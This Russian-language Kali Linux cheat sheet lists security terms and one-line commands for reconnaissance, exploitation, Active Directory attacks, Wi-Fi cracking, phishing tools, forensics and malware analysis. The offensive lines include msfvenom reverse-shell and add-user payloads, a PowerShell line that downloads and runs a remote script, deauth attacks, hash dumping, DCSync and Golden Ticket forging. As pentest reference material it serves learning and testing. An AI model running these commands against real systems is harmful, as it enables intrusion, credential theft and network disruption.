Kali Linux — Команды и Терминология

Терминология

  • OSINT — разведка из открытых источников (Open Source Intelligence).
  • Метаданные — информация о файлах, фото, видео (EXIF, GPS, дата создания).
  • Цифровой след — активность в сети (соцсети, форумы, утечки).
  • Скрейпинг — автоматический сбор данных с веб-страниц.
  • Даркнет — скрытая часть интернета (Tor, I2P).
  • Google Dorks — специальные поисковые запросы для поиска уязвимостей.
  • Recon-ng — фреймворк для разведки.
  • Пентест — тестирование на проникновение (оценка безопасности).
  • Эксплойт — код для использования уязвимостей.
  • Payload — вредоносная нагрузка (Meterpreter, Shell).
  • Privilege Escalation — повышение привилегий (root/admin).
  • Lateral Movement — перемещение внутри сети.
  • CVE — база уязвимостей (Common Vulnerabilities and Exposures).
  • OWASP Top 10 — топ-10 веб-уязвимостей.
  • Эксплойт — код, использующий уязвимость в системе.
  • Zero-day — неизвестная уязвимость без патча.
  • ROP — Return-Oriented Programming (техника обхода DEP).
  • ASLR — рандомизация адресного пространства.
  • Buffer Overflow — переполнение буфера.
  • Shellcode — машинный код для выполнения в эксплойте.
  • Metasploit — фреймворк для разработки эксплойтов.
  • TCP/IP — стек сетевых протоколов.
  • OSI — модель взаимодействия сетевых протоколов.
  • NAT — преобразование сетевых адресов.
  • VPN — виртуальная частная сеть.
  • IDS/IPS — системы обнаружения/предотвращения вторжений.
  • MAC-адрес — уникальный идентификатор сетевого устройства.
  • ARP — протокол определения MAC-адреса.
  • Red Team — команда, имитирующая атаки.
  • Blue Team — команда защиты.
  • Purple Team — взаимодействие Red и Blue.
  • APT — целевая продвинутая атака.
  • C2 — Command and Control (сервер управления).
  • Lateral Movement — перемещение внутри сети.
  • Persistence — поддержание доступа к системе.

Kali Команды

  • theHarvester -d example.com -b all — сбор информации о домене
  • whois example.com — информация о домене
  • metagoofil -d example.com -t pdf — поиск и скачивание документов
  • exiftool image.jpg — просмотр метаданных
  • sherlock username — поиск пользователя в соцсетях
  • recon-ng — фреймворк для разведки
  • maltego — визуализация связей
  • nmap -sV -A target.com — сканирование портов и сервисов
  • msfconsole — запуск Metasploit Framework
  • searchsploit apache 2.4 — поиск эксплойтов
  • sqlmap -u "http://site.com/page?id=1" — тестирование SQL-инъекций
  • burpsuite — инструмент для тестирования веб-приложений
  • nikto -h http://target.com — сканер уязвимостей веб-сервера
  • hydra -l user -P passlist.txt ssh://target — брутфорс аутентификации
  • msfvenom -p windows/meterpreter/reverse_tcp LHOST=your_ip LPORT=4444 -f exe > payload.exe — создание полезной нагрузки
  • exploit/multi/handler — обработчик Metasploit для payload
  • searchsploit -x linux/local/12345 — просмотр кода эксплойта
  • gdb -q ./vulnerable_program — отладка программы
  • checksec --file=/bin/ls — проверка защит бинарного файла
  • pattern_create.rb 500 — создание шаблона для поиска смещения
  • ropper --file=bin --search "pop rdi" — поиск ROP-гаджетов
  • nmap -sS -p- 192.168.1.1 — TCP SYN сканирование
  • tcpdump -i eth0 port 80 — перехват трафика на порту 80
  • wireshark — анализ сетевого трафика
  • netcat -lvnp 4444 — прослушивание порта
  • arp-scan -l — сканирование сети по ARP
  • iptables -L — просмотр правил фаервола
  • sshuttle -r user@server 0.0.0.0/0 — VPN через SSH
  • cobaltstrike — платформа для Red Team операций
  • mimikatz — извлечение учетных данных Windows
  • bloodhound — анализ домена Active Directory
  • impacket-secretsdump administrator@target — дамп хэшей
  • powershell -nop -c "IEX(New-Object Net.WebClient).DownloadString('http://bit.ly/1kEhUx1')" — выполнение PowerShell скрипта
  • empire — пост-эксплуатационный фреймворк
  • kerberoast — атака на сервисные аккаунты Kerberos
Kali Linux — Дополнительные разделы

Терминология

  • Форензика — сбор и анализ цифровых доказательств.
  • RAM-дамп — содержимое оперативной памяти.
  • Живой анализ — исследование работающей системы.
  • Мертвый анализ — исследование выключенной системы.
  • Хеш-сумма — цифровой отпечаток файла (MD5, SHA1).
  • Write blocker — устройство для защиты от записи.
  • Timeline — временная шкала событий.
  • Wi-Fi — беспроводная сеть.
  • WPA/WPA2 — протоколы защиты Wi-Fi.
  • Handshake — процесс аутентификации в Wi-Fi.
  • SSID — имя беспроводной сети.
  • MAC-фильтрация — контроль доступа по MAC-адресу.
  • Deauth — атака отключения клиентов.
  • Evil Twin — фальшивая точка доступа.
  • Социнженерия — манипуляция людьми.
  • Фишинг — поддельные страницы/письма.
  • Вишинг — фишинг по телефону.
  • Претекстинг — создание ложного сценария.
  • Baiting — использование "приманки".
  • Tailgating — проникновение вслед за сотрудником.
  • SET — Social Engineering Toolkit.
  • SQLi — внедрение SQL-кода.
  • XSS — межсайтовый скриптинг.
  • CSRF — подделка межсайтовых запросов.
  • LFI/RFI — включение локальных/удаленных файлов.
  • SSRF — подделка запросов на сервере.
  • JWT — токены веб-аутентификации.
  • CORS — политика кросс-доменных запросов.
  • Шифрование — преобразование данных.
  • Асимметричное — пара ключей (публичный/приватный).
  • Симметричное — один ключ для шифрования/дешифровки.
  • Хеш — необратимое преобразование (SHA, MD5).
  • SSL/TLS — протоколы защищенного соединения.
  • PGP — стандарт шифрования сообщений.
  • Steganography — скрытие данных в других файлах.
  • Стеганография — скрытие данных.
  • LSB — метод замены младших битов.
  • Spectrum — анализ частотного спектра.
  • Watermarking — цифровые водяные знаки.
  • Steghide — инструмент для стеганографии.
  • Binwalk — анализ файлов на скрытые данные.
  • Metadata — скрытая информация в файлах.
  • Вредоносное ПО — программы для атак.
  • Вирус — самокопирующийся код.
  • Червь — самораспространяющаяся программа.
  • Троян — маскируется под легальное ПО.
  • Ransomware — шифрует данные для выкупа.
  • Rootkit — скрывает свое присутствие.
  • Botnet — сеть зараженных компьютеров.

Kali Команды

  • volatility -f memory.dump imageinfo — анализ дампа памяти
  • binwalk image.jpg — поиск скрытых данных в файле
  • foremost -i disk.img -o output — восстановление удаленных файлов
  • strings file.bin | grep "password" — поиск строк в бинарном файле
  • dd if=/dev/sda1 of=image.dd bs=4K — создание образа диска
  • autopsy — графический инструмент для форензики
  • photorec — восстановление удаленных файлов
  • airmon-ng start wlan0 — переход в режим монитора
  • airodump-ng wlan0mon — сканирование Wi-Fi сетей
  • aireplay-ng --deauth 10 -a BSSID wlan0mon — deauth атака
  • aircrack-ng handshake.cap -w wordlist.txt — взлом WPA
  • wash -i wlan0mon — поиск WPS-сетей
  • reaver -i wlan0mon -b BSSID -vv — атака на WPS
  • wifite — автоматизированный инструмент для взлома Wi-Fi
  • setoolkit — Social Engineering Toolkit
  • gophish — платформа для фишинговых кампаний
  • evilginx2 — фреймворк для фишинга 2FA
  • king-phisher — фишинговая кампания
  • shellphish — фишинг социальных сетей
  • hidden-eye — создание фишинговых страниц
  • socialfish — еще один инструмент для фишинга
  • dirb http://target.com — поиск директорий
  • gobuster dir -u http://target.com -w wordlist.txt — перебор директорий
  • wfuzz -c -z file,wordlist.txt --hc 404 http://target.com/FUZZ — фаззинг
  • commix --url="http://target.com/?id=1" — тестирование на RCE
  • xsstrike -u "http://target.com/search?q=test" — тестирование на XSS
  • whatweb target.com — идентификация веб-технологий
  • subfinder -d target.com — поиск поддоменов
  • openssl aes-256-cbc -salt -in file.txt -out file.enc — шифрование файла
  • openssl aes-256-cbc -d -in file.enc -out file.txt — дешифрование
  • gpg --encrypt --recipient [email protected] file.txt — шифрование GPG
  • gpg --decrypt file.txt.gpg — дешифрование GPG
  • hashcat -m 0 hash.txt wordlist.txt — брутфорс хэшей
  • john --format=raw-md5 --wordlist=wordlist.txt hash.txt — взлом хэшей
  • sslscan target.com — анализ SSL/TLS настроек
  • steghide embed -cf image.jpg -ef secret.txt — скрытие данных
  • steghide extract -sf image.jpg — извлечение данных
  • stegosuite image.jpg — графический инструмент стеганографии
  • stegdetect image.jpg — обнаружение стеганографии
  • zsteg image.png — обнаружение данных в PNG
  • outguess -r image.jpg output.txt — извлечение данных
  • stegsolve — анализ изображений на скрытые данные
  • strings malware.exe — анализ строк в бинарнике
  • peframe malware.exe — анализ PE-файла
  • capa malware.exe — анализ возможностей вредоноса
  • yara -r rules.yar suspicious_file — обнаружение вредоносов
  • radare2 -AAA malware.exe — дизассемблирование
  • ghidra — реверс-инжиниринг
  • cuckoo — песочница для анализа вредоносов
Kali Linux — Продвинутые техники

Терминология

  • SUID/SGID — исполняемые файлы с повышенными привилегиями
  • Capabilities — гранулярные права Linux-процессов
  • Kernel Exploit — эксплуатация уязвимостей ядра
  • Sudo Hijacking — подмена переменных окружения sudo
  • DLL Hijacking — подмена библиотек в Windows
  • Token Impersonation — кража токенов в Windows
  • AlwaysInstallElevated — уязвимая политика Windows
  • Kerberoasting — атака на сервисные аккаунты Kerberos
  • Golden Ticket — поддельные TGT-билеты Kerberos
  • DCSync — синхронизация хэшей с контроллера домена
  • Pass-the-Hash — аутентификация без пароля
  • BloodHound — анализ путей атак в AD
  • GPO Abuse — эксплуатация групповых политик
  • Unconstrained Delegation — неограниченное делегирование
  • Service Discovery — обнаружение сетевых сервисов
  • OS Fingerprinting — определение ОС по отпечаткам
  • SMB Enumeration — сбор информации через SMB
  • SNMP Walking — перебор SNMP-объектов
  • LDAP Recon — разведка через LDAP-запросы
  • DNS Zone Transfer — перенос DNS-зоны
  • Cloud Metadata — сбор данных облачных провайдеров
  • Disassembly — преобразование бинарного кода в ассемблер
  • Decompilation — восстановление исходного кода
  • Debugging — пошаговое выполнение программы
  • Function Analysis — анализ функций программы
  • ROP Chains — цепочки для обхода DEP
  • Anti-Debugging — техники против отладки
  • Packing/Unpacking — упаковка/распаковка исполняемых файлов
  • Stack Overflow — переполнение стека
  • Heap Overflow — переполнение кучи
  • Format String — атака на строки формата
  • Use-After-Free — использование освобожденной памяти
  • ASLR Bypass — обход рандомизации адресов
  • NX/DEP Bypass — обход запрета исполнения
  • ROP/JOP — программирование через return/jump-ориентированные цепочки
  • IoC — индикаторы компрометации
  • EDR Evasion — обход систем защиты конечных точек
  • Sysmon Analysis — анализ логов Sysmon
  • YARA Rules — правила для обнаружения вредоносов
  • Sigma Rules — универсальные правила детектирования
  • Memory Forensics — анализ оперативной памяти
  • Lateral Movement Detection — обнаружение перемещений в сети

Kali Команды

  • find / -perm -u=s -type f 2>/dev/null — поиск SUID-файлов
  • python -c 'import os; os.execl("/bin/sh", "sh", "-p")' — эксплуатация SUID
  • getcap -r / 2>/dev/null — поиск capabilities
  • sudo -l — проверка доступных sudo-команд
  • windows-exploit-suggester.py --update — поиск уязвимостей Windows
  • secretsdump.py -sam sam.save -system system.save LOCAL — дамп хэшей
  • msfvenom -p windows/adduser USER=hacker PASS=Hack123! -f exe > user.exe — создание пользователя
  • GetUserSPNs.py -request -dc-ip 10.10.10.1 domain/user — Kerberoasting
  • secretsdump.py -just-dc domain/[email protected] — DCSync атака
  • ticketer.py -nthash aad3b435b51404eeaad3b435b51404ee -domain-sid S-1-5-21-... Administrator — Golden Ticket
  • bloodhound-python -d domain -u user -p 'pass' -ns 10.10.10.1 -c All — сбор данных для BloodHound
  • smbmap.py -H 10.10.10.1 -u user -p 'pass' — перебор SMB-ресурсов
  • ntlmrelayx.py -tf targets.txt -smb2support — NTLM Relay атака
  • lookupsid.py domain/[email protected] — перебор SID
  • nmap -sV -sC -oA scan 10.10.10.1 — базовое сканирование
  • smbclient -L //10.10.10.1 -U user — список SMB-ресурсов
  • snmpwalk -c public -v1 10.10.10.1 — SNMP-разведка
  • ldapsearch -x -h 10.10.10.1 -b "dc=domain,dc=local" — LDAP-запросы
  • dig axfr @10.10.10.1 domain.local — DNS Zone Transfer
  • curl http://169.254.169.254/latest/meta-data/ — облачные метаданные AWS
  • enum4linux -a 10.10.10.1 — комплексная разведка Windows
  • objdump -d binary — дизассемблирование
  • gdb -q ./binary — отладка в GDB
  • radare2 -AAA ./binary — анализ в radare2
  • ghidra — запуск Ghidra
  • strings ./binary — извлечение строк
  • ltrace ./binary — трассировка библиотечных вызовов
  • strace ./binary — трассировка системных вызовов
  • checksec --file=binary — проверка защит
  • pattern_create.rb 500 — создание шаблона
  • ropper --file=binary --search "pop rdi" — поиск ROP-гаджетов
  • msf-pattern_offset -l 500 -q 0x41413741 — поиск смещения
  • one_gadget /lib/x86_64-linux-gnu/libc.so.6 — поиск one-gadget
  • pwntools — фреймворк для эксплоитов
  • ROPgadget --binary binary — поиск гаджетов
  • yara -r rules.yar /suspicious — сканирование YARA
  • chainsaw hunt — анализ логов с Chainsaw
  • velociraptor query "SELECT * FROM pslist()" — сбор данных
  • hayabusa ./logs — анализ событий Windows
  • sigma-scan -r rules/ -e ./logs — применение Sigma-правил
  • volatility -f memory.dump pslist — анализ процессов в дампе
  • zeek -r traffic.pcap — анализ сетевого трафика